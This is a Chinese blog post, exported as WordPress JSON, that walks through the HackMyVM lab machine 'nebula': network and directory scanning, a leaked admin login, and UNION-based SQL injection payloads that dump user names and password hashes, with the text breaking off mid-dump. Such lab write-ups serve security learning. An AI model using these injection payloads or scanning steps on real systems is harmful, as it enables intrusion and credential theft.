{"id":419,"date":"2024-03-19T01:50:31","date_gmt":"2024-03-18T17:50:31","guid":{"rendered":"http:\/\/162.14.82.114\/?p=419"},"modified":"2024-03-19T01:50:31","modified_gmt":"2024-03-18T17:50:31","slug":"hmv-_-nebula","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/419\/03\/19\/2024\/","title":{"rendered":"hmv[-_-]nebula"},"content":{"rendered":"<h1>nebula<\/h1>\n<p>\u6253\u4e0d\u5f00\uff0c\u6b63\u5e38\u7684\uff0c\u5148\u5bfc\u5165<code>virtualbox<\/code>\u518d\u8f6c\u62101.0\u683c\u5f0f\u7684\u5bfc\u51fa\u6765\uff0c\u6700\u540e\u4e22\u8fdb<code>vmware<\/code>\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403190148116.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403190148116.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240318193904545\"  \/><\/div><\/p>\n<p>\u5b8c\u86cb\uff0c\u53c8\u548c<code>quick<\/code>\u4e00\u4e2a\u5fb7\u884c\uff0c\u626b\u4e00\u4e0b\uff0c\u679c\u7136\u626b\u4e0d\u5230\uff0c\u66f4\u6539\u4e00\u4e0b\u517c\u5bb9\u6027\uff0c\u6539\u4e3anat\u6a21\u5f0f\uff0c\u518d\u8bd5\u8bd5\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403190148118.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403190148118.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240318194137633\"  \/><\/div><\/p>\n<p>\u770b\u4e0a\u53bb\u7a0d\u5fae\u9760\u8c31\u4e86\u4e00\u70b9\u70b9\uff0c\u4e0d\u77e5\u9053\u662f\u56e0\u4e3a\u517c\u5bb9\u6027\u8fd8\u662fnat\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403190148119.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403190148119.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240318194226343\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u626b\u4e0d\u5230\uff0c\u725b\u903c\uff0c\u8bf4\u4e86<code>vmware<\/code>\u53ef\u4ee5\u517c\u5bb9\u7684\uff0c\u7ed3\u679c\u7ed9\u6211\u6765\u865a\u7684\uff0c\u800c\u4e14<code>ubuntu20.04<\/code>\u9ed8\u8ba4\u8fd8\u4e0d\u5e26grub\uff0c\u6de6\u3002\u8bd5\u4e00\u4e0b<code>vritualbox<\/code>\u3002<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403190148120.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403190148120.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240318195212314\" style=\"zoom:33%;\" \/><\/div><\/p>\n<p>\u5c45\u7136\u53ef\u4ee5\uff0c\u6211\u771f\u7684\u8981\u5410\u8840\u4e86\uff0c\u884c\u5427\uff0c\u5148\u8fd9\u4e48\u505a\u5427\u3002<\/p>\n<h2>\u4fe1\u606f\u641c\u96c6<\/h2>\n<h3>\u7aef\u53e3\u626b\u63cf<\/h3>\n<pre><code class=\"language-bash\">nmap -sV -sT -T4 -p- 10.0.2.5 <\/code><\/pre>\n<pre><code class=\"language-text\">PORT   STATE SERVICE VERSION\n22\/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)\n80\/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n<h3>\u76ee\u5f55\u626b\u63cf<\/h3>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403190148121.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403190148121.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240318195622871\" style=\"zoom:50%;\" \/><\/div><\/p>\n<pre><code class=\"language-bash\">dirb 10.0.2.5<\/code><\/pre>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~]\n\u2514\u2500$ dirb  http:\/\/10.0.2.5\/\n-----------------\nDIRB v2.22    \nBy The Dark Raver\n-----------------\nSTART_TIME: Mon Mar 18 07:57:54 2024\nURL_BASE: http:\/\/10.0.2.5\/\nWORDLIST_FILES: \/usr\/share\/dirb\/wordlists\/common.txt\n-----------------\nGENERATED WORDS: 4612                                                          \n---- Scanning URL: http:\/\/10.0.2.5\/ ----\n==&gt; DIRECTORY: http:\/\/10.0.2.5\/img\/                                                                                   \n+ http:\/\/10.0.2.5\/index.php (CODE:200|SIZE:3479)                                                                      \n==&gt; DIRECTORY: http:\/\/10.0.2.5\/login\/                                                                                 \n+ http:\/\/10.0.2.5\/server-status (CODE:403|SIZE:273)\n---- Entering directory: http:\/\/10.0.2.5\/img\/ ----\n(!) WARNING: Directory IS LISTABLE. No need to scan it.                        \n    (Use mode &#039;-w&#039; if you want to scan it anyway)\n---- Entering directory: http:\/\/10.0.2.5\/login\/ ----\n+ http:\/\/10.0.2.5\/login\/index.php (CODE:200|SIZE:1551)                                                                \n-----------------\nEND_TIME: Mon Mar 18 07:57:57 2024\nDOWNLOADED: 9224 - FOUND: 3<\/code><\/pre>\n<p>\u770b\u6765\u6240\u89c1\u5373\u6240\u5f97\u4e86\u3002<\/p>\n<h2>\u6f0f\u6d1e\u5229\u7528<\/h2>\n<p>\u76f4\u63a5ssh\u80af\u5b9a\u662f\u4e0d\u884c\u7684\u4e86\uff0c\u5c1d\u8bd5\u627e\u4e00\u4e0b\u6709\u65e0\u5176\u4ed6\u7684\u529e\u6cd5\uff0c\u53ef\u4ee5\u770b\u5230\u6709\u4e00\u4e2a\u767b\u5f55\u754c\u9762\uff0c\u8fdb\u53bb\u7785\u7785\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403190148122.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403190148122.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240318200105679\" style=\"zoom:33%;\" \/><\/div><\/p>\n<p>\u8001\u6837\u5b50\uff0c\u5f31\u5bc6\u7801\u548c\u4e07\u80fd\u5bc6\u7801\uff0c\u8fdb\u4e0d\u53bb\uff0cxieng\uff01<\/p>\n<p>\u53ef\u80fd\u6709\u76ee\u5f55\u6ca1\u626b\u5230\uff0c\u91cd\u65b0 fuzz \u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-bash\">ffuf -u http:\/\/10.0.2.5\/FUZZ -w \/usr\/share\/seclists\/Discovery\/Web-Content\/raft-medium-directories-lowercase.txt<\/code><\/pre>\n<p>\u4f46\u662f\u6211\u5728<code>virtualbox<\/code>\u7684kali\u5c45\u7136\u6ca1\u6709\u8fd9\u4e2a\u5e93\u3002\u3002\u3002\u3002<\/p>\n<pre><code class=\"language-bash\">ls -lh \/usr\/share\/seclists\/\nls: cannot access &#039;\/usr\/share\/seclists\/&#039;: No such file or directory<\/code><\/pre>\n<p>\u73b0\u4f20\u4e00\u4e2a\u5148\u628a\u641e\u4e86\u5427\uff0c\u8fd8\u4e0d\u4e00\u5b9a\u80fd\u7528\u4e0a\u5462\uff0c\u6574\u4e2a<code>seclist<\/code>1\u4e2a\u591aG\u3002\u3002\u3002\u3002<\/p>\n<pre><code class=\"language-bash\">ffuf -u http:\/\/10.0.2.5\/FUZZ -w raft-medium-directories-lowercase.txt<\/code><\/pre>\n<p>\u6c14\u6655\u4e86  -_-``` ~~<\/p>\n<pre><code class=\"language-text\">img                     [Status: 301, Size: 302, Words: 20, Lines: 10, Duration: 2ms]\nlogin                   [Status: 301, Size: 304, Words: 20, Lines: 10, Duration: 407ms]\nserver-status           [Status: 403, Size: 273, Words: 20, Lines: 10, Duration: 1ms]<\/code><\/pre>\n<p>\u8d8a\u626b\u8d8a\u5c11\uff0c\u884c\u884c\u884c\uff0c\u6362\u4e2a\u5927\u4e00\u70b9\u7684\u5b57\u5178\uff1a<\/p>\n<pre><code class=\"language-bash\">ffuf -u http:\/\/10.0.2.5\/FUZZ -w directory-list-lowercase-2.3-medium.txt<\/code><\/pre>\n<p>\u518d\u626b\u4e0d\u51fa\u6765\u5c31\u4e0d\u627e\u8fd9\u4e2a\u4e86\uff0c\u53ef\u80fd\u4e0d\u662f\u654f\u611f\u76ee\u5f55\u5165\u624b\u7684\u3002<\/p>\n<pre><code class=\"language-text\">img                     [Status: 301, Size: 302, Words: 20, Lines: 10, Duration: 410ms]\njoinus                  [Status: 301, Size: 305, Words: 20, Lines: 10, Duration: 1ms]\n                        [Status: 200, Size: 3479, Words: 669, Lines: 77, Duration: 3ms]\nserver-status           [Status: 403, Size: 273, Words: 20, Lines: 10, Duration: 2ms]<\/code><\/pre>\n<p>\u6b38\u563f\uff0c\u771f\u626b\u51fa\u6765\u4e86\uff0c\u770b\u770b\u6709\u54ea\u4e9b\u4e1c\u897f\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403190148123.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403190148123.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240318202633200\" \/><\/div><\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403190148124.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403190148124.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240318202647113\" \/><\/div><\/p>\n<p>\u96be\u9053\u662f\u9690\u6c34\u5370\uff1f\u7b49\u4e0b\u505a\u4e0d\u51fa\u6765\u53ef\u4ee5\u8bd5\u8bd5\uff0c<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403190148125.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403190148125.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240318202823442\" \/><\/div><\/p>\n<p>\u6253\u5f00\u53d1\u73b0\u6709\u4e00\u4e2apdf\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403190148126.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403190148126.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240318202845110\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u6c57\u6d41\u6d43\u80cc\u4e86\uff0c\u8981\u662f\u6ca1\u7ee7\u7eed\u641c\u96c6\u5c31\u5bc4\u4e86\u3002\u3002\u3002\u3002<\/p>\n<pre><code class=\"language-apl\">admin\nd46df8e6a5627debf930f7b5c8f3b083<\/code><\/pre>\n<p>\u767b\u5f55\u4e00\u4e0b\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403190148127.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403190148127.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240318203429049\" \/><\/div><\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403190148128.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403190148128.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240318203450864\" \/><\/div><\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403190148129.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403190148129.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240318212501848\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u770b\u6765\u662f\u524d\u9762\u90a3\u4e2a\uff0c\u53c8\u662f\u4e2a\u67e5\u8be2\u4fe1\u606f\u7684\u5730\u65b9\uff0c\u731c\u6d4b\u53c8\u662fsql\u6ce8\u5165\u6f0f\u6d1e\u3002\u3002\u3002\u3002<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403190148130.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403190148130.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240318213009846\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u679c\u7136\u3002\u3002\u3002\u3002<\/p>\n<pre><code class=\"language-bash\">ctf&#039; union select schema_name,2,3 from information_schema.schemata-- -<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403190148131.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403190148131.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240318213135764\" style=\"zoom:50%;\" \/><\/div><\/p>\n<pre><code class=\"language-bash\">ctf&#039; union select table_name,2,3 from information_schema.tables where table_schema=&quot;nebuladb&quot;-- -<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403190148132.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403190148132.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240318213238316\" \/><\/div><\/p>\n<pre><code class=\"language-bash\">&#039; union select column_name,2,3 from information_schema.columns where table_schema=&quot;nebuladb&quot; and table_name=&quot;users&quot;-- -<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403190148133.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403190148133.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240318213422011\" \/><\/div><\/p>\n<pre><code>&#039; union select concat(username, password),2,3 from nebuladb.users-- -\n&#039; union select username, password,3 from nebuladb.users-- -<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403190148134.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403190148134.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240318213740351\" \/><\/div><\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403190148135.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403190148135.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240318213817585\" style=\"zoom:50%;\" \/><\/div><\/p>\n<pre><code class=\"language-apl\">admin                   d46df8e6a5627debf930f7b5c8f3b083    \npmccentral              c8c605999f3d8352d7bb792cf3fdb25b    \nFrederick               5f823f1ac7c9767c8d1efbf44158e0ea    \nSamuel                  